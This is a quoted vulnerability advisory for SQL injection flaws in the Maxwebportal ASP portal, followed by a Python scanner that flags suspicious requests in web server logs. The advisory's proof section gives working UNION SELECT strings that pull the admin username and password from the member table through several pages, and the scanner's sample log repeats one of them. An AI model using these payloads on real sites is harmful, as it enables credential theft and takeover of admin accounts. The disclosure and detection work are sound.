QUOTE

Critical SQL injections in Maxwebportal

Vendor URL: http://www.maxwebportal.info , http://www.maxwebportal.com
Solution: Some patches are available at www.maxwebportal.info
Cause: SQL injection
Version: all versions before 2005/4/27 (maxwebportal 2.x, 1.35 , ... )
Fix Available: Some of them are available
Finder: Soroush Dalili

Description: A remote user can find other users' passwords through some SQL
injections and so can gain admin of the portal!
What's that? -> Maxwebportal is a good and free ASP portal that is used in many
sites (also on my old site!)
Bugz:
A remote user can gain other users' passwords through SQL injections in:
article_popular.asp
dl_popular.asp
links_popular.asp
pic_popular.asp
article_rate.asp
dl_rate.asp
links_rate.asp
pic_rates.asp
article_toprated.asp
dl_toprated.asp
links_toprated.asp
pic_toprated.asp
------------------------------------------------------------------------------------------------------------
Proof:
Some Exploits:
Get Username=Admin password: (if I didn't write some of them, you can make
them easily by yourself!)
----------------
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
---------------
Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where
m_username='admin' union select
--------------
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL,
POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select
-------------
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1
FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
------------
you can make it in other pages too!
-----------------------------------------------------------------------------------------------
Some other SQL injections are:
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]
custom_link.asp?method=Forum&Forum_ID=[Sql inject]

-----------------------------------------------------------------------------------------------
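
For defenders reviewing web server logs from an affected install, the following is an added example and not part of the quoted advisory or the vendor's patch. It assumes the *_popular.asp and *_toprated.asp pages normally receive only a bare number as the query string (as the leading 40 and 10 in the proof strings suggest), that TOPIC_ID and Forum_ID are normally numeric, and that the log uses the field order noted in the comment; the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Pages whose proof strings in the advisory start with a bare number (?40, ?10).
COUNT_PAGE = re.compile(r"(?:^|/)(?:article|dl|links|pics?)_(?:popular|toprated)\.asp$", re.I)
CUSTOM_LINK = re.compile(r"(?:^|/)custom_link\.asp$", re.I)
ID_PARAMS = {"topic_id", "forum_id"}  # parameters the advisory marks as injectable
DIGITS = re.compile(r"[0-9]+")

# Constructed sample log; assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2005-04-20 10:01:02 192.0.2.10 GET /portal/dl_popular.asp 40 200
2005-04-20 10:01:09 192.0.2.77 GET /portal/Dl_Popular.asp 40+DL_ID,Hit+FROM+DL+union+select+m_username,m_password 200
2005-04-20 10:02:30 192.0.2.10 GET /portal/custom_link.asp method=Topic&TOPIC_ID=12 200
2005-04-20 10:02:41 192.0.2.77 GET /portal/custom_link.asp method=Forum&Forum_ID=3%27 200
2005-04-20 10:03:00 192.0.2.10 GET /portal/default.asp - 200
"""

def is_suspicious(stem, query):
    """Return a reason string if the request breaks the expected numeric shape, else None."""
    if query == "-":  # logged placeholder for an empty query string
        query = ""
    if COUNT_PAGE.search(stem):
        decoded = unquote_plus(query)
        if decoded and not DIGITS.fullmatch(decoded):
            return "non-numeric count in query string"
    elif CUSTOM_LINK.search(stem):
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in ID_PARAMS and not DIGITS.fullmatch(value.strip()):
                return f"non-numeric {name}"
    return None

def scan(log_text):
    """Return a list of (client_ip, stem, reason) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip header directives and short or blank lines
        ip, stem, query = fields[2], fields[4], fields[5]
        reason = is_suspicious(stem, query)
        if reason:
            hits.append((ip, stem, reason))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

The same numeric-only rule is what a server-side input check on these pages would enforce; the *_rate.asp pages are left out because the advisory does not show their parameter format.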



